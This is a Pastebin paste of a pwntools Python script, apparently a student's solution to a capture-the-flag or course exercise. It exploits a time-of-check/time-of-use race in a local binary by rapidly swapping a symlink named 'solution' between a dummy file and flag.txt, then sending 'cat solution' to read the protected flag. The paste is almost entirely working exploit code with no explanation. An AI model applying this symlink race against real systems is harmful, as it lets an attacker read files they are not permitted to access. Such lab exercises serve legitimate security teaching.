Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-
- from pwn import *
- import os
- import threading
- import time
- exe = context.binary = ELF(args.EXE or './main.elf')
- context(terminal=['tmux', 'split-window', '-h'])
- def start(argv=[], *a, **kw):
- if args.GDB:
- return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
- else:
- return process([exe.path] + argv, *a, **kw)
- gdbscript = '''
- tbreak main
- continue
- '''
- io = start()
- # Student Code Area
- ########################################################################
- # begin student code
- def create_symlink(target, link_name):
- '''Creates a symbolic link.'''
- try:
- if os.path.exists(link_name):
- os.unlink(link_name)
- os.symlink(target, link_name)
- except Exception as e:
- print(f"Error creating symlink: {e}")
- def race_condition(stop_event):
- '''Perform the race condition by toggling the symlink.'''
- while not stop_event.is_set():
- create_symlink("dummy", "solution")
- time.sleep(0.001) # Adjust timing as needed
- create_symlink("flag.txt", "solution")
- # Create a dummy file
- with open("dummy", "w") as f:
- f.write("This is a dummy file.")
- # Event to control the race condition thread
- stop_event = threading.Event()
- race_thread = threading.Thread(target=race_condition, args=(stop_event,))
- race_thread.daemon = True
- race_thread.start()
- # Provide the input command to the binary
- # Pass the entire command as if it's entered interactively
- io.sendline(b"cat solution") # Ensure the input is in bytes
- # Capture all output and search for the flag
- output = io.recvall(timeout=10).decode()
- print(f"Program output:\n{output}")
- # Stop the race condition thread gracefully
- stop_event.set()
- race_thread.join()
- # end student code
- ########################################################################
- io.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
